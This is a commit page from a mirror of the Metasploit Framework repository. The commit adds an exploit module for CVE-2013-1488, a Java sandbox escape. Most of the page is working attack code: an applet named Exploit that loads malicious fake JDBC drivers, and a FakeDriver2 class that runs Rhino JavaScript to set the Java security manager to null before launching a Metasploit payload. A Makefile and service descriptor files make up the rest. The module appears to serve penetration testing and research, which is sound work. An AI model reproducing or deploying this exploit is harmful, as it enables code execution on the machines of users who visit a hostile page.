mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Add module for CVE-2013-1488
This commit is contained in:
parent
b34c3fbbc1
commit
7090d4609b
BIN
data/exploits/cve-2013-1488/Exploit.class
Normal file
BIN
data/exploits/cve-2013-1488/Exploit.class
Normal file
Binary file not shown.
BIN
data/exploits/cve-2013-1488/FakeDriver.class
Normal file
BIN
data/exploits/cve-2013-1488/FakeDriver.class
Normal file
Binary file not shown.
BIN
data/exploits/cve-2013-1488/FakeDriver2.class
Normal file
BIN
data/exploits/cve-2013-1488/FakeDriver2.class
Normal file
Binary file not shown.
1
data/exploits/cve-2013-1488/META-INF/services/java.lang.Object
Executable file
1
data/exploits/cve-2013-1488/META-INF/services/java.lang.Object
Executable file
@ -0,0 +1 @@
|
||||
com.sun.script.javascript.RhinoScriptEngine
|
2
data/exploits/cve-2013-1488/META-INF/services/java.sql.Driver
Executable file
2
data/exploits/cve-2013-1488/META-INF/services/java.sql.Driver
Executable file
@ -0,0 +1,2 @@
|
||||
FakeDriver
|
||||
FakeDriver2
|
41
external/source/exploits/cve-2013-1488/Exploit.java
vendored
Executable file
41
external/source/exploits/cve-2013-1488/Exploit.java
vendored
Executable file
@ -0,0 +1,41 @@
|
||||
import java.applet.Applet;
|
||||
import java.awt.Graphics;
|
||||
import java.sql.*;
|
||||
//import java.lang.Runtime;
|
||||
import metasploit.Payload;
|
||||
|
||||
public class Exploit extends Applet
|
||||
{
|
||||
|
||||
public Exploit()
|
||||
{
|
||||
}
|
||||
|
||||
public void init()
|
||||
{
|
||||
try
|
||||
{
|
||||
System.out.println("Here we go...");
|
||||
String url = "jdbc:msf:sql://127.0.0.1:8080/sample";
|
||||
String userid = "userid";
|
||||
String password = "password";
|
||||
Connection con = DriverManager.getConnection(url, userid, password);
|
||||
}
|
||||
catch(Exception localThrowable)
|
||||
{
|
||||
//localThrowable.printStackTrace();
|
||||
}
|
||||
try {
|
||||
Payload.main(null);
|
||||
//Runtime.getRuntime().exec("calc.exe");
|
||||
|
||||
} catch(Exception ex) {
|
||||
//ex.printStackTrace();
|
||||
}
|
||||
}
|
||||
|
||||
public void paint(Graphics paramGraphics)
|
||||
{
|
||||
paramGraphics.drawString("Loading", 50, 25);
|
||||
}
|
||||
}
|
65
external/source/exploits/cve-2013-1488/FakeDriver.java
vendored
Executable file
65
external/source/exploits/cve-2013-1488/FakeDriver.java
vendored
Executable file
@ -0,0 +1,65 @@
|
||||
import java.sql.*;
|
||||
import java.util.logging.Logger;
|
||||
import java.util.Properties;
|
||||
import java.util.AbstractSet;
|
||||
import java.util.ServiceLoader;
|
||||
import java.util.Iterator;
|
||||
|
||||
|
||||
public class FakeDriver extends AbstractSet implements java.sql.Driver
|
||||
{
|
||||
public static final String URL_PREFIX = "jdbc:msf:sql:";
|
||||
public static ServiceLoader _s1;
|
||||
|
||||
static {
|
||||
_s1 = ServiceLoader.load(Object.class);
|
||||
}
|
||||
|
||||
public Iterator iterator()
|
||||
{
|
||||
return _s1.iterator();
|
||||
}
|
||||
|
||||
public FakeDriver() {
|
||||
}
|
||||
|
||||
public final boolean acceptsURL(String url)
|
||||
throws SQLException
|
||||
{
|
||||
return true;
|
||||
}
|
||||
|
||||
public final boolean jdbcCompliant() {
|
||||
return true;
|
||||
}
|
||||
|
||||
public final Logger getParentLogger() {
|
||||
return null;
|
||||
}
|
||||
|
||||
public final int getMinorVersion() {
|
||||
return 0;
|
||||
}
|
||||
|
||||
public final int getMajorVersion() {
|
||||
return 1;
|
||||
}
|
||||
|
||||
public final DriverPropertyInfo[] getPropertyInfo(String url, Properties info)
|
||||
throws SQLException
|
||||
{
|
||||
return null;
|
||||
}
|
||||
|
||||
|
||||
public final Connection connect(String url, Properties info)
|
||||
throws SQLException
|
||||
{
|
||||
return null;
|
||||
}
|
||||
|
||||
//AbstractSet
|
||||
public final int size() {
|
||||
return 2;
|
||||
}
|
||||
}
|
70
external/source/exploits/cve-2013-1488/FakeDriver2.java
vendored
Executable file
70
external/source/exploits/cve-2013-1488/FakeDriver2.java
vendored
Executable file
@ -0,0 +1,70 @@
|
||||
import java.sql.*;
|
||||
import java.util.logging.Logger;
|
||||
import java.util.Properties;
|
||||
import java.util.HashSet;
|
||||
import java.util.Iterator;
|
||||
import javax.script.*;
|
||||
import java.io.*;
|
||||
import java.lang.*;
|
||||
|
||||
public class FakeDriver2 extends HashSet implements java.sql.Driver
|
||||
{
|
||||
public static final String URL_PREFIX = "jdbc:msf:sql:";
|
||||
|
||||
static {
|
||||
|
||||
}
|
||||
|
||||
public FakeDriver2() {
|
||||
Iterator i = FakeDriver._s1.iterator();
|
||||
try {
|
||||
ScriptEngine e = (ScriptEngine)i.next();
|
||||
Object proxy = (Object) e.eval(
|
||||
"this.toString = function() {" +
|
||||
" java.lang.System.setSecurityManager(null);" +
|
||||
" return '';" +
|
||||
"};" +
|
||||
"e = new Error();" +
|
||||
"e.message = this;" +
|
||||
"e");
|
||||
this.add(proxy);
|
||||
} catch (Exception ex) {
|
||||
//ex.printStackTrace();
|
||||
}
|
||||
}
|
||||
|
||||
public final boolean acceptsURL(String url)
|
||||
throws SQLException
|
||||
{
|
||||
return true;
|
||||
}
|
||||
|
||||
public final boolean jdbcCompliant() {
|
||||
return true;
|
||||
}
|
||||
|
||||
public final Logger getParentLogger() {
|
||||
return null;
|
||||
}
|
||||
|
||||
public final int getMinorVersion() {
|
||||
return 0;
|
||||
}
|
||||
|
||||
public final int getMajorVersion() {
|
||||
return 1;
|
||||
}
|
||||
|
||||
public final DriverPropertyInfo[] getPropertyInfo(String url, Properties info)
|
||||
throws SQLException
|
||||
{
|
||||
return null;
|
||||
}
|
||||
|
||||
public final Connection connect(String url, Properties info)
|
||||
throws SQLException
|
||||
{
|
||||
return null;
|
||||
}
|
||||
|
||||
}
|
1
external/source/exploits/cve-2013-1488/META-INF/services/java.lang.Object
vendored
Executable file
1
external/source/exploits/cve-2013-1488/META-INF/services/java.lang.Object
vendored
Executable file
@ -0,0 +1 @@
|
||||
com.sun.script.javascript.RhinoScriptEngine
|
2
external/source/exploits/cve-2013-1488/META-INF/services/java.sql.Driver
vendored
Executable file
2
external/source/exploits/cve-2013-1488/META-INF/services/java.sql.Driver
vendored
Executable file
@ -0,0 +1,2 @@
|
||||
FakeDriver
|
||||
FakeDriver2
|
19
external/source/exploits/cve-2013-1488/Makefile
vendored
Normal file
19
external/source/exploits/cve-2013-1488/Makefile
vendored
Normal file
@ -0,0 +1,19 @@
|
||||
CLASSES = \
|
||||
Exploit.java \
|
||||
FakeDriver.java \
|
||||
FakeDriver2.java
|
||||
|
||||
.SUFFIXES: .java .class
|
||||
.java.class:
|
||||
javac -source 1.2 -target 1.2 -cp "../../../../data/java:." $*.java
|
||||
|
||||
all: $(CLASSES:.java=.class)
|
||||
|
||||
install:
|
||||
mv Exploit.class ../../../../data/exploits/cve-2013-1488/
|
||||
mv FakeDriver.class ../../../../data/exploits/cve-2013-1488/
|
||||
mv FakeDriver2.class ../../../../data/exploits/cve-2013-1488/
|
||||
cp -r META-INF ../../../../data/exploits/cve-2013-1488/
|
||||
|
||||
clean:
|
||||
rm -rf *.class
|
Loading…
Reference in New Issue
Block a user